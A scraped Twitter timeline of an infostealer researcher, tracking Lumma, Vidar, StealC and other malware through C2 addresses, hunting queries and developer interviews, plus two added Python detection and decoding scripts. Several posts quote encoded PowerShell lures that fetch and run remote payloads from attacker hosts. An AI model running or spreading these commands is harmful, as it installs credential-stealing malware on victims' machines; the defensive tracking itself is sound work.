Who said what

@g0njxa

3,132 Followers
176 Following
788 Media
2,729 Statuses

He who does what he can is not obliged to do more | donate to g0njxa.eth | Bad student, enthusiast, defo not an expert. DMs are open, feel free to reach out!

Valencia, Spain
Joined January 2023
Pinned Tweet
@g0njxa
Who said what
10 months
In the past weeks I interviewed the staff of the major infostealer projects, a total of 7: Lumma, Raccoon, Meduza, Vidar, Amadey, StealC, Meta. Below you will find a short summary of this series, which ends today, and also the ones who refused to talk.
@g0njxa
Who said what
1 month
Google Chrome implemented an update that caused a major outage in cookie collection from infostealers, and users are experiencing several issues. Vidar talks about the usage of "a TPM module for encryption". Vidar, Lumma and StealC are already working on this issue to fix it.
@g0njxa
Who said what
1 year
I mean... Don't let your archive be exposed to the public. #opendir http://77.91.68.78/lend/ Redline, Lumma, Warzone RAT, Meduza Stealer, Povertystealer, Formbook, Raccoon, AsyncRAT, Rhadamanthys, Smoke Loader, WhiteSnake & a miner on hashvault
@g0njxa
Who said what
3 months
#Remcos RAT being delivered as a fake CrowdStrike hotfix, targeting @bbva bank from: /portalintranetgrupobbva.com Delivered via Dropbox. C2: 213.5.130.58:443 Detonation:
@g0njxa
Who said what
1 month
Slight changes on this #Lumma campaign, new frontend and payload design: powershell -W Hidden -eC aQBlAHgAIAAoAGkAdwByACAAaAB0AHQAcABzADoALwAvAHkAaQBwAC4AcwB1AC8AMgA1AHkAWAA5ADQAIAAtAFUAcwBlAEIAYQBzAGkAYwBQAGEAcgBzAGkAbgBnACkALgBDAG8AbgB0AGUAbgB0AA==
@g0njxa
Who said what
2 months
Watch for malicious traffic on shady websites, don't paste anything on your PC. #Lumma Stealer powershell.exe -eC bQBzAGgAdABhACAAaAB0AHQAcABzADoALwAvAGwAZQBuAGcAbwAtADIAMABjAGIANAAuAGsAeABjAGQAbgAuAGMAbwBtAC8AawBqAGQAZgBoAGUAdwBlAA== Detonation:
@g0njxa
Who said what
1 month
#Lumma Stealer has just announced an update featuring an app-bound cookie encryption bypass on Google Chrome, fixing the issue. Full statement:
@g0njxa
Who said what
4 months
The #Meduza stealer has been banned from XSS forum after being accused of infecting Russian individuals and failing to protect these users from being infected by the stealer. Same issues as Rhadamanthys a few weeks ago.
@g0njxa
Who said what
1 year
#Meduza Stealer is not dead! Search for C2 panels on @fofabot : icon_hash="-559608920" Some new panels: 193.233.133.81 146.70.161.13 77.105.147.136 185.106.94.31 212.113.116.56 89.185.85.132 95.181.173.235 95.181.173.8 95.181.173.233 89.185.85.34
@g0njxa
Who said what
1 year
#Raccoon Stealer has been observed using a new User-Agent: GunnaWunnaBlueTips, since at least 05-13 hxxps://telegra.ph/WareHacks-Soft-04-22 C2 #RacconV2 #Recordbreaker 37.220.87.66 45.9.74.99 UA: GunnaWunnaBlueTips @crep1x
@g0njxa
Who said what
22 days
reCAPTCHA malware campaign is now abusing @Vultr S3 buckets and CDN to deliver #Lumma Stealer. Detonation: Also loading another unidentified binary from /onefreex.com/api/download that only downloads with a custom User-Agent:
@g0njxa
Who said what
1 month
FYI, a current updated #Lumma Stealer panel /oldlumma.fun/login @ViriBack also the current Lumma API domain /funlumma.fun (Updated on August 17th from /apilumma1.fun)
@g0njxa
Who said what
21 days
Quick changes on this reCAPTCHA malware campaign, now abusing @digitalocean S3 buckets and CDN to still deliver #Lumma Stealer. Similar behavior. Detonation:
@g0njxa
Who said what
1 month
#Lumar stealer (not Lumma!), also known and tracked as #PovertyStealer (), is one of the next infostealers to implement a bypass to the new Google Chrome v128 cookie encryption. With some disadvantage: the build needs administrator rights
@g0njxa
Who said what
3 months
Let's follow with more macOS malware. A brief interview with Ping3r aka Atomic macOS Stealer (AMOS). The infamous original, the alleged first one. Exclusive content on #defcon32 days, because why not. Take a break, take a read!
@g0njxa
Who said what
1 year
Anonfiles, one of the major free file storage providers that existed in the past years, has announced the end of its service and the domain is now for sale @vxunderground RIP anonfiles :(
@g0njxa
Who said what
1 month
#WhiteSnake stealer allegedly has no issue with cookie collection from the most recent Chrome 128 version as of today.
@RussianPanda9xx
RussianPanda
1 month
#MeduzaStealer is pushing out the bypass method in the test version to get cookies from Chrome 127. The pricing is still the same. Translation: Some stealer users encountered Chrome update 127, which changed the encryption for cookies by executing the process in a separate
@g0njxa
Who said what
1 month
The infamous #Vidar Stealer also announced today an update featuring its own bypass to the newest Google Chrome app-bound cookie encryption (without admin privileges). This announcement follows those from the infostealers Meduza, Lumma and Lumar. Full statement:
@g0njxa
Who said what
6 months
The infamous #Rhadamanthys Stealer has been banned from XSS forum after failing to provide protection to people in CIS countries. Rhadamanthys was used against Russian military infrastructure (), also by some fellow traffers guys...
@g0njxa
Who said what
10 months
#Rhadamanthys Stealer being spread via fake KMSPico downloads /kms-full.com/install.php > /kms-product.eu > /kms-product.pro > DropBox Loaded from /176.113.115.224:6230/3178c C2: 185.130.226.143:6575 Detonation:
@g0njxa
Who said what
3 months
Never found nor seen a #StealC stealer panel, but that is how it should look from inside
@g0njxa
Who said what
1 month
#WhiteSnake Stealer has recently announced an update featuring the creation of malicious .SLN (Visual Studio Solution) files as downloaders from a remote host in order to serve malware. Full changelog statement below:
@g0njxa
Who said what
24 days
The infamous #META Stealer becomes the next infostealer to claim the collection of cookies from the most updated versions of the Google Chrome browser (v129). After Lumma, Lumar, Meduza, Vidar, StealC, Rhadamanthys, WhiteSnake... Who is missing? Full statement:
@g0njxa
Who said what
1 month
#StealC stealer updated a few days ago featuring cookie collection from updated Google Chrome browser versions. Statement:
@g0njxa
Who said what
1 month
#Lumma Stealer just announced an update on its method to collect cookies from the most recent Google Chrome browser. Full statement:
@g0njxa
Who said what
11 months
I recently made an interview with #Lumma Stealer staff. Just a brief talk :) They want to say hello to all of us. The malware project is near its 1st anniversary, it's time to dive into Lumma. Read it at:
@g0njxa
Who said what
11 months
I made a little interview with #Meduza Stealer staff. The "Immaculate" stealer and heir to Aurora's (RIP) legacy shared a little time talking about his product. Take a look at:
@g0njxa
Who said what
10 months
You can also track the latest #Qakbot C2 servers with @fofabot jarm="21d14d00021d21d21c42d43d0000007abc6200da92c2a1b69c0a56366cbe21" && header_hash="480868286"
@V3n0mStrike
Ven0m
10 months
I have some certainty that these hunting rules would help identify command and control servers. Shodan: Censys: #Qakbot
@g0njxa
Who said what
1 month
You may still have some curiosity about how macOS infostealers were born and the history behind this kind of malware. After the long months they have existed there were still some stories to tell, so be careful with your own judgements! Feel free to take a read:
@g0njxa
Who said what
1 year
The new exfiltration method used by #Lumma Stealer would be POST requests to a new endpoint at C2 servers. Let's say goodbye to /c2sock & /c2conf (RIP) New endpoint: /api act=recive_message (Configuration request) act=send_message (Exfiltration) @AnFam17 @evstykas
@g0njxa
Who said what
11 months
#Rhadamanthys stealer is now offering a similar service to #Lumma: Restoration of expired Google sessions
@ddd1ms
Dmitry Smilyanets
11 months
There is a very interesting development happening with #Lumma Stealer. Seems like they figured out a way to restore expired Google sessions.
@g0njxa
Who said what
9 months
#Lumma Stealer has just been updated, featuring the partnership with "GhostSocks", a SOCKS5 manager. So it seems like Lumma Stealer will now be leveraging SOCKS5 proxies from victims. I don't know how this works but I believe something like other proxy malware ( #SystemBC )
@g0njxa
Who said what
4 months
Hunting for #ClearFake / #ClickFix with @fofabot Malicious script seen in the wild leveraging the "Etherhiding" technique using ETH address () we can search for domains infected by this campaign using these addresses. Hunt query:
@threatinsight
Threat Insight
4 months
Proofpoint threat researchers have noticed that a clever #socialengineering tactic is becoming increasingly popular amongst threat actors. The campaign tricks end users into copying and pasting malicious PowerShell scripts, ultimately installing malware.
@g0njxa
Who said what
3 months
#Lumma Stealer has now opened a "Log Market" where Lumma operators (with a storefront code) can sell their own logs directly from their panel. Purchase is made through crypto deposits to BTC or ETH addresses. Currently there are ~5700 logs on sale from unknown vendors
@g0njxa
Who said what
25 days
Threat actors are abusing @teamguilded CDN to deliver #AsyncRAT via malicious Visual Studio Code projects on compromised GitHub accounts disguised as fake game cheats and fake Discord infostealers cc / @SquiblydooBlog @Cipher0091 Detonation: Thread:
@g0njxa
Who said what
1 month
Operators behind this #lumma campaign also dropped an XMR miner. Detonation: After reporting to the pool, the worker was disconnected, with an amazing reward (not paid) generated of 0.00079836 XMR ($0.14) between 09/18 21:00 and 09/19 13:00 UTC profit
@vxunderground
vx-underground
1 month
Crazy Thursday. - Dr. Web, the Russian antivirus company, disclosed a breach. Dr. Web stopped sending antivirus updates September 16th. Subsequently, Dr. Web reportedly disconnected their servers from their internal network while they investigated the suspected compromise. Dr.
@g0njxa
Who said what
6 months
#Lumma Stealer implemented a bot protection system, "pre-trained on screenshots of known virtual machines", 2 months ago. They now claim to have detected 483k bots, avoiding 68k "garbage logs", reducing usage of HDDs and helping the world to become cleaner with less CO2 emissions
@g0njxa
Who said what
1 year
Introducing #Amadey Botnet v4, as seen in new PrivateLoader campaigns. http://77.91.97.162/g93kdwj3S/Login.php So far, a new GUI has been discovered and URLs are now 2 chars longer. Traffic cc @Jane_0sint NEW v4 / OLD v3
@g0njxa
Who said what
4 months
CryptoGrab, a crypto drainer service, was granted a stand at MAC Yerevan 2024, where "staff and top members" met with the people at the conference, sharing merch and some drinks. First spotted by @0xneosec All photos:
@g0njxa
Who said what
9 months
Following the ban on XSS forum, the Lockbit profile has also been banned from Exploit. Reason: Ripper
@azalsecurity
AzAl Security
9 months
LockbitSupp has been banned from XSS forum for not paying the 10% as requested by the admin. cc: @Jon__DiMaggio @ddd1ms @3xp0rtblog @AShukuhi @vxunderground @Cyberknow20 @uuallan @BrettCallow @BushidoToken
@g0njxa
Who said what
1 year
Something new has been spotted on YT: #Redline and #Ransomware MAD HAT #MADHAT Ransom is $50, so an honest price to "protect" data already stolen by Redline @AnFam17 @Gi7w0rm @Jane_0sint
@g0njxa
Who said what
11 months
I made an interview with the #StealC stealer owner. We talked about his malware project, and he "wishes us good luck" in our hunting. Please read it at:
@g0njxa
Who said what
6 months
Seems like now #infostealers have found a way to collect valuable information from Mozilla-based browser extensions. These are new features on some known stealers, first reported by #Lumma Stealer in mid April and followed, for example, by #ACR Stealer and #Vidar at the moment
@g0njxa
Who said what
11 months
I made an interview with #Vidar staff. The infamous Vidar stealer (at its 5th anniversary) and I had a little talk about his malware project. They say that "there is no need to hold a grudge against us"... Read it at:
@g0njxa
Who said what
1 month
Google Chrome browser v129 was released on September 17th, 2024, and one of the "new" features that got infostealer devs' attention is the storage of CVC codes from credit cards. #WhiteSnake updated recently, featuring the grabbing of this information from victims' browsers.
@g0njxa
Who said what
11 months
I made an interview with #Recordbreaker Stealer staff. Not many questions, just asking things about Raccoon Stealer. Will "MrBidenNeverKnow" be the next User-Agent that we will find on this stealer? Take a look at:
@g0njxa
Who said what
6 months
Have you ever heard about #Dracula stealer? Sample: C2 - 195.10.205.74:1953 Detonation: ping @RussianPanda9xx @Jane_0sint
@g0njxa
Who said what
1 year
If you didn't notice, some websites involved with #ClearFake #FakeUpdates campaigns seem to be sending download records to a Telegram bot, forwarded to a group. 46.255.201.42 - CN authenticprod[.]fr styktraffred - Group name applemalicalo_bot - Bot user
@g0njxa
Who said what
3 months
#PrivateLoader now serves its builds from an FTP server.
1 - download a .zip from a compromised host (/institutodeseguros.com.pe)
2 - Zip contains a .lnk that retrieves the PrivateLoader build .zip from FTP server 147.45.47.80
Stage 3 - AutoIt loader
@g0njxa
Who said what
7 months
Just came across a weird #malware campaign being spread on X via malicious ads (help!). TL showed me this ad /Andristo_88/status/1776305295263756467 which is aiming at /audacityteam.top (suspended). Find it at archive showing the website and more:
@g0njxa
Who said what
1 year
Yayyy!!!! #Raccoon Stealer aka #recordbreaker has been updated. I'm updating the User-Agents and Official Announcements Chart. @Gi7w0rm @crep1x Hunt the raccoon!!! Thanks, @suyog41
@suyog41
Yogesh Londhe
1 year
Raccoon Stealer New User-Agent : SunShineMoonLight 24bdb92d93d301d2e58b84f4e5161909 #Raccoon #Stealer #IOC
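The two Raccoon User-Agent strings reported on this page (GunnaWunnaBlueTips earlier, SunShineMoonLight here) and the Lumma C2 change posted above (POST /api with act=recive_message / act=send_message replacing /c2sock and /c2conf) are the kind of indicators that are cheap to hunt for in proxy or Zeek HTTP logs. The block below is an added example, not the author's or any vendor's detection content: it runs those signatures over a few constructed JSON-lines records. It assumes the act= parameter is visible at the start of the POST body, as the tweet describes, and that the log exports the fields used here (ts, dst, method, uri, user_agent, body); rename them to match your pipeline.

```python
import json

# Indicator strings lifted from the tweets on this page; nothing is fetched live.
RACCOON_USER_AGENTS = {"GunnaWunnaBlueTips", "SunShineMoonLight"}
LUMMA_API_ACTIONS = {
    "act=recive_message": "lumma_api_config",   # the "recive" misspelling is itself a good signature
    "act=send_message": "lumma_api_exfil",
}
LUMMA_LEGACY_PATHS = {"/c2sock", "/c2conf"}

# Constructed sample log (JSON lines). Destinations are RFC 5737 documentation addresses,
# not real C2s; the field layout is this example's assumption.
SAMPLE_LOG = """\
{"ts":"2024-09-19T21:00:01Z","dst":"203.0.113.10","method":"POST","uri":"/api","user_agent":"Mozilla/5.0","body":"act=recive_message&ver=4"}
{"ts":"2024-09-19T21:00:02Z","dst":"203.0.113.10","method":"POST","uri":"/api","user_agent":"Mozilla/5.0","body":"act=send_message&uid=abc"}
{"ts":"2024-09-19T21:00:03Z","dst":"203.0.113.11","method":"POST","uri":"/api","user_agent":"Mozilla/5.0","body":"act=login&user=x"}
{"ts":"2024-09-19T21:00:04Z","dst":"203.0.113.12","method":"POST","uri":"/","user_agent":"GunnaWunnaBlueTips","body":""}
{"ts":"2024-09-19T21:00:05Z","dst":"203.0.113.13","method":"POST","uri":"/c2conf","user_agent":"Mozilla/5.0","body":""}
{"ts":"2024-09-19T21:00:06Z","dst":"203.0.113.14","method":"GET","uri":"/index.html","user_agent":"Mozilla/5.0","body":""}
"""


def classify(rec: dict) -> list:
    """Return the detection names that fire on one HTTP record."""
    hits = []
    method = rec.get("method", "").upper()
    uri = rec.get("uri", "")
    body = rec.get("body", "")
    ua = rec.get("user_agent", "")
    # Lumma: the action is a POST to /api; a GET with the same parameter is not the C2 protocol
    if method == "POST" and uri == "/api":
        for prefix, name in LUMMA_API_ACTIONS.items():
            if body.startswith(prefix):
                hits.append(name)
    if uri in LUMMA_LEGACY_PATHS:             # older Lumma builds still on the old endpoints
        hits.append("lumma_legacy_endpoint")
    if ua in RACCOON_USER_AGENTS:             # exact match: these are not browser-like UAs
        hits.append("raccoon_v2_user_agent")
    return hits


def scan(log_text: str) -> list:
    """Return (timestamp, destination, detection) for every hit in a JSON-lines log.
    Malformed lines are skipped so one bad record cannot abort the hunt."""
    out = []
    for line in log_text.splitlines():
        if not line.strip():
            continue
        try:
            rec = json.loads(line)
        except json.JSONDecodeError:
            continue
        for name in classify(rec):
            out.append((rec.get("ts", ""), rec.get("dst", ""), name))
    return out


if __name__ == "__main__":
    for ts, dst, name in scan(SAMPLE_LOG):
        print(ts, dst, name)
```

Exact-match User-Agent rules like these are brittle by design: the thread itself records the UA changing between builds, so treat each one as a dated indicator and pair it with the protocol-level rule (POST /api with act=) that is harder for the operator to rotate.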
@g0njxa
Who said what
9 months
Privateloader Rewind 2023: +1 million unique installs in 2023. A humble blog about the InstallsKey PPI service. Profiling customers, the sources of their installations and the service itself! Also available at /t.me/privateloader (EN & RU)
@g0njxa
Who said what
8 months
While the #lockbit disruption is deservedly getting all the attention, seems like other ransomware gangs are getting issues, talking about #Stormous ransomware. Stormous #DOWN
@g0njxa
Who said what
1 year
CHAOS is an open-source RAT (/github.com/tiagorlampert/CHAOS) that was somewhat popular and abused last year, and it's still in use! Track this on @fofabot fid="9BUak7FRNMoqKoJPH7v8Lw=="
@g0njxa
Who said what
10 months
#WhiteSnake Stealer is now releasing an update featuring Google cookies restoration. Same features after #Lumma , #Rhadamanthys , #Risepro , #Meduza , #Stealc Anyone else?
@g0njxa
Who said what
1 year
US, Canada, UK and Australia websites are compromised to serve Fortnite spam (again). At first, TA seems to be abusing Kentico CMS media libraries. Compromised websites include Bing Blogs, credit unions, medical institutions and NGOs. See full list!
@g0njxa
Who said what
1 year
hxxp://77.91.78.118/test2.bat Cute privilege escalation method dropped by #Amadey Loader. It also disables any restore point on the infected host and blocks downloads from browsers.
@g0njxa
Who said what
1 year
Ironhost IO - BulletProof Servers joined the PrivateLoader campaign serving as a C2 since 1st November. 91.92.243.151 - ironhost[.]io Need a fast and reliable bulletproof server? Do not wait!
@g0njxa
Who said what
1 month
just released Safebrowsing, a new service that lets you quickly explore URLs in an isolated virtual browser. It notifies you about threats and has a friendly interface, perfect for users with any expertise level. Give it a try, it's free:
@g0njxa
Who said what
2 months
A new one, still delivering #Lumma Stealer powershell.exe -eC bQBzAGgAdABhACAAaAB0AHQAcABzADoALwAvAHYAZQByAGkAZgAuAGQAbAB2AGkAZABlAG8AcwBmAHIAZQAuAGMAbABpAGMAawAvADIAbgBkAGgAcwBvAHIAdQA= Detonation:
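The encoded command lines pasted in these ClickFix / fake-CAPTCHA posts (the kxcdn.com and dlvideosfre.click mshta lures above, and the yip.su iex/iwr variant earlier on the page) all use powershell -EncodedCommand, which is base64 over UTF-16LE text, not UTF-8; decoding it as UTF-8 gives the familiar null-padded garbage. The block below is an added triage helper, not the author's tooling: it pulls the blob out of a pasted command line, decodes it, defangs the hosts and flags the download-and-run primitive. The three sample lines are the ones posted on this page; everything else (the field names, the stager list) is this example's own.

```python
import base64
import re

# Sample inputs: the three command lines posted in the tweets on this page, copied verbatim.
SAMPLES = [
    "powershell -W Hidden -eC aQBlAHgAIAAoAGkAdwByACAAaAB0AHQAcABzADoALwAvAHkAaQBwAC4AcwB1AC8AMgA1AHkAWAA5ADQAIAAtAFUAcwBlAEIAYQBzAGkAYwBQAGEAcgBzAGkAbgBnACkALgBDAG8AbgB0AGUAbgB0AA==",
    "powershell.exe -eC bQBzAGgAdABhACAAaAB0AHQAcABzADoALwAvAGwAZQBuAGcAbwAtADIAMABjAGIANAAuAGsAeABjAGQAbgAuAGMAbwBtAC8AawBqAGQAZgBoAGUAdwBlAA==",
    "powershell.exe -eC bQBzAGgAdABhACAAaAB0AHQAcABzADoALwAvAHYAZQByAGkAZgAuAGQAbAB2AGkAZABlAG8AcwBmAHIAZQAuAGMAbABpAGMAawAvADIAbgBkAGgAcwBvAHIAdQA=",
]

# -e / -ec / -enc / -EncodedCommand in any case, then the base64 blob
ENC_FLAG_RE = re.compile(r"-(?:encodedcommand|enc|ec|e)\s+([A-Za-z0-9+/=]+)", re.IGNORECASE)
URL_RE = re.compile(r"https?://[^\s'\"()]+", re.IGNORECASE)
# Download-and-execute primitives these lures lean on (this example's own list)
STAGERS = ("mshta", "iwr", "invoke-webrequest", "iex", "invoke-expression",
           "curl", "certutil", "bitsadmin", "rundll32", "regsvr32")


def extract_blob(cmdline: str):
    """Return the encoded-command argument from a pasted command line, or None."""
    m = ENC_FLAG_RE.search(cmdline)
    return m.group(1) if m else None


def decode_encoded_command(blob: str) -> str:
    """-EncodedCommand is base64 of UTF-16LE text. An odd byte count means the
    blob is not a PowerShell encoded command (or was truncated when pasted)."""
    raw = base64.b64decode(blob, validate=True)
    if len(raw) % 2:
        raise ValueError("odd byte count: not UTF-16LE, refusing to guess")
    return raw.decode("utf-16-le")


def defang(host: str) -> str:
    return host.replace(".", "[.]")


def triage(cmdline: str):
    """Decode one pasted command line into what an analyst wants to see first."""
    blob = extract_blob(cmdline)
    if blob is None:
        return None
    cmd = decode_encoded_command(blob)
    urls = URL_RE.findall(cmd)
    low = cmd.lower()
    # match whole tokens so e.g. "iex" is not found inside another word
    stagers = [s for s in STAGERS if re.search(rf"(?<![\w-]){re.escape(s)}(?![\w-])", low)]
    return {
        "command": cmd,
        "hosts": sorted({defang(u.split("/")[2]) for u in urls}),
        "stagers": stagers,
        "remote_exec": bool(urls) and bool(stagers),
    }


if __name__ == "__main__":
    for line in SAMPLES:
        r = triage(line)
        print(r["stagers"], r["hosts"], "remote_exec=%s" % r["remote_exec"])
```

Feed it the raw text from a clipboard hijack or a Run-dialog lure; the decoded command is kept intact for the report while the hosts come back defanged so they can be pasted into a ticket without becoming clickable.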
@g0njxa
Who said what
6 months
Have you ever wondered what is going on with Vietnamese (VN) malware targeting Facebook accounts? I did, so you can get a quick overview of these threat actors' activities and how they are spending (and earning) millions of $$$ Read now! #dropshipping
@g0njxa
Who said what
1 year
What kind of Stealer is this? Something new? C2 94.142.138.97/Up I think this stealer likes browser cookies the most. Take a look!
@g0njxa
Who said what
22 days
#QuasarRAT being deployed via malicious VSCode extensions. Detonation: C2: /azure-winsecure.com 154.216.20.132:6969 Source:
@LehmannLorenz
Lorenz Lehmann
22 days
Today, my PC was nearly compromised. With just one click, I installed a malicious @code extension. Luckily, I was saved as my PC doesn't run on Windows. Hackers are getting smarter and aren't just targeting beginners. Here's how they do it and how you can protect your coins!
@g0njxa
Who said what
11 months
You can also hunt #Mirai botnet C2 servers with @fofabot body_hash="331221342" Evidence since September 17th
@1ZRR4H
Germán Fernández
11 months
Hunting #Mirai botnet C2 servers Shodan: Censys: Combining the results (12 C&C): 91.92.249.96 45.142.182.95 104.248.150.52 45.156.24.179 91.92.243.156 93.123.85.86 64.227.96.75 46.29.162.49 205.185.122.208 45.63.6.19
@g0njxa
Who said what
1 year
Fresh #BlankGrabber Python stealer () being shared on YouTube targeting users via fake Valorant cheats. be578842ae7a7d0b51f20bac551645a6 log password "baim123"
@g0njxa
Who said what
1 year
Android botnets ain't dead! #Ermac V3.0 Botnet C2 Panel 91.215.85.213 Didn't find any information on this new version of this botnet. Previous V2 had some leak in March 2023. This was a previous C2 for StealC @0x6rss want to take a look? :)
@g0njxa
Who said what
11 months
A few days ago, the #Amadey owner and I did a brief interview. We talked about the past, present and future of the infamous #Amadey Loader, one of the biggest products in the MaaS environment. Something worth a read. Please find it at:
@g0njxa
Who said what
1 year
#Lumma Stealer updated its capabilities recently. It now has the ability to load other files while executing the main stealer, and self-deletion after that. This behavior is common on other stealers like #Vidar or #recordbreaker , loading crypto clippers like #laplas . Very active.
@g0njxa
Who said what
2 months
InCrease, developer of the #Amadey loader, has decided to share with me some exclusive footage of the upcoming v5 Amadey panel with the new "features, stats and FAQ". These are currently available to a few Amadey beta-testers; release is scheduled for the 6th anniversary in October 2024.
@g0njxa
Who said what
6 months
โš ๏ธWatch out fake AV websites sharing malware #Spynote (for android) /avast-securedownload.com @Avast #Lumma Stealer /bitdefender-app.com @Bitdefender #StealC (via Buer Loader?) /malwarebytes.pro @Malwarebytes samples and detonations below ๐Ÿ‘€
Tweet media one
Tweet media two
Tweet media three
2
16
38
@g0njxa
Who said what
7 months
Let's discover one of the "youngest" infostealer traffer teams playing bad around... Ghostbusters aka MMM Team +70k victims recorded in less than a year with +100 members disclosed, still active. Absolute customization of builds and more!!
@g0njxa
Who said what
7 months
FYI, Last updates:
META - 4.5.1 (Mar 12)
RedLine - 30 (Feb 22)
Lumma - Apr 10
Raccoon - 2.3.1.1 (⌛?💀)
Vidar - 9 (Apr 10)
StealC - 1.8.1 (Feb 23)
Meduza - 2.5.1 (Apr 3)
WhiteSnake - 1.6.1.9 (Mar 20)
Rhadamanthys - 0.6.0 (Feb 17)
Amadey - 4.19.2 (Apr 8)
@g0njxa
Who said what
1 year
An unknown #stealer has been spotted on YT! C2 http://146.71.81.144/ Cookie stealer, file grabber, crypto wallets, password managers and screenshots, everything POSTed to C2. Take a look! Just uploaded to VT
@g0njxa
Who said what
4 months
#StealC stealer has recently released an update (v1.9.2) featuring an "offline" version (without requests to C2, the log is stored on the victim) and also a DLL version allegedly copied from #Vidar Stealer. These features allow StealC to be used as an enumeration / discovery tool
@g0njxa
Who said what
1 year
@LinkedIn accounts are compromised on a daily basis to join a big SEO poisoning campaign via LinkedIn Pulses. Users are then redirected to fake malicious sites where malware is distributed, mainly #Lumma Stealer, #Cryptbot and #AMOS for Mac users (finally found!)
@g0njxa
Who said what
21 days
Victim's IP summarization of this malware campaign: 3,213 unique victims - Top 3 (NG, IN, US)
@RacWatchin8872
WatchingRac
21 days
#Malware #FakeExtension https://paste[.]ee/d/7BWJv First Stage: PowerShell contains the second stage encrypted with AES Key: shPqUHUWix2FT774bsf1DDdHLLk0/f8fL1HysAHuu5c= IV: 5bIo7oI0RxH+S8WqSBLskg==
@g0njxa
Who said what
1 year
More live #Clearfake ! This is not about RU, this is China (CN)! Search on @fofabot title="Google Chrome 网络浏览器" Examples: /www.updateload.live/ /ggsdown.top /update.chrome-up.com/ /y13xlt1d.xyz/ /url.drvceo.com /kcdq78.fit Check samples!
@g0njxa
Who said what
9 months
#Meta Stealer just got updated to v4.3. So it seems like malware developers are now using AI to sign builds in order to avoid detections? @NexusFuzzy I believe the same updates will be seen on Redline soon, as usual. Check everything
@g0njxa
Who said what
7 months
Watch out for Dynamics 365 *.microsoftcrmportals domains, abused in the "free vbucks" SEO poisoning campaign /osvolunteers.microsoftcrmportals.com /fms.microsoftcrmportals.com /indspire.microsoftcrmportals.com /ecosoft.microsoftcrmportals.com /bggtscsp.microsoftcrmportals.com
@g0njxa
Who said what
1 year
hxxp://bratzen.duckdns.org/byte/ #Opendir Unknown #loader hosting unknown payloads as a commercial loader for malware distribution. Stored as .txt with the client TG username. Seen on #PrivateLoader campaigns
@g0njxa
Who said what
6 months
The infamous Raccoon stealer has not been updated for long months and the activity in the wild has dropped (talking about me, I see no more Raccoon). Asked his staff; seems like the old coder left and there's a new one working on it, so we must expect new updates soon!
@g0njxa
Who said what
3 months
macOS malware has been a trend in the past months... They are a threat that can be found in the wild pretty easily. So why not release some interviews with macOS infostealers? Today, a brief talk with the Poseidon Stealer dev aka Rodrigo
@g0njxa
Who said what
11 months
@vxunderground @Elsaidy_pastry from Egypt
@g0njxa
Who said what
1 year
Hunting #Clearfake with @fofabot fid="QddxtK34KUI1XP5ujfy5bw==" Track the latest compromised domains: /altenara.com /doolittles.be /easymall.co.th /megacarwreckers.com.au /filmovita.ba /staging.armipour.com /or-and.com /esmito.com /sistemajogodobicho.com There should be more!
@g0njxa
Who said what
1 month
I was there @_JohnHammond
@g0njxa
Who said what
1 year
#Amadey is back on PrivateLoader campaigns after some days of inactivity. Loaded via #opendir (LgoogLoader) /85.217.144.143/files/ new C2 panel http://193.42.32.29/9bDc8sQ/Login.php Still not fixed, patch it NOW! @evstykas Full detonation:
@g0njxa
Who said what
3 months
#Rhadamanthys kept their word and released new versions (v0.7), keeping the malware project alive. New API interface, frameworks rewritten and usage of AI for (mnemonic) phrase extraction? Full statement below!
@g0njxa
Who said what
6 months
The #Rhadamanthys Stealer project is not dead (after being banned from XSS and Exploit forums). Its owner is now featuring a "new beginning", with future releases of new versions.
@g0njxa
Who said what
1 year
#FAKEUPDATES live update /88.99.105.167 /63.141.252.148 /51.38.115.103 /paolomorettifurs.com/temp/EngineChromium.zip Drops from #opendir /77.105.147.44/river/strit/wantworkerpro.zip #Purelogs Stealer 185.138.164.41:7705 Detonation
@g0njxa
Who said what
10 months
Something crazy is now being pushed by #Privateloader: opens a pop-up window with a Microsoft error and a QR code. /pcrrent.com (Microsoft phishing) (CN)?? Financial information is asked for and exfiltrated via POST to /pcrrent.com/index.php Full detonation:
@g0njxa
Who said what
1 year
Track #HookBot panels with @fofabot fid="8ZfqDfBADcCVT8Cf796SUg==" recent ones (November): /bravevikingser.xyz /91.92.249.18 /20.39.184.218 /161.35.235.125 /178.23.190.21 /87.98.185.14 /199.101.135.49 /94.156.64.181 /91.92.245.80 /91.215.85.153 more!
@g0njxa
Who said what
2 months
Somebody found a TG bot API hash from Snake Keylogger (like me) and decided to share free malware on all chats. A stealer with no detections, what is it? C2: http://128.199.113.162/XtfcshEgt/upwawsfrg.php panel: 128.199.113.162 @ViriBack Detonation:
@g0njxa
Who said what
4 months
#META stealer v5.0 is actually released after the previous announcement. Featuring TLS encryption between build and C2 panel (as seen in other stealers like Lumma or Vidar in recent updates), among other new and fancy features. Check everything
@g0njxa
Who said what
4 months
#META stealer announced recently an incoming update on June 17th featuring a "new, unique and individual system". Current version is v4.6 from May 23rd. Let's see what they prepare...
@g0njxa
Who said what
10 months
The use of SSL certificates on #stealers' communication to C2 servers is becoming popular among these malware projects. Exfiltration over HTTPS allegedly makes them "receive less detections on c2s and prolong its life". A recent example is #Lumma Stealer
@g0njxa
Who said what
3 months
CrowdStrike outage is fake, there is no incident!!!! We hacked into a company using CrowdStrike and everything was good, stop spreading disinformation in the media you liars!!!!
@g0njxa
Who said what
18 days
Fake @PocketUniverseZ impersonating the Chrome Extensions Web Store, sharing unidentified malware /universepocket.top > /pocketuniverre.store Sample (zipped): Sample (raw): Spread on YouTube: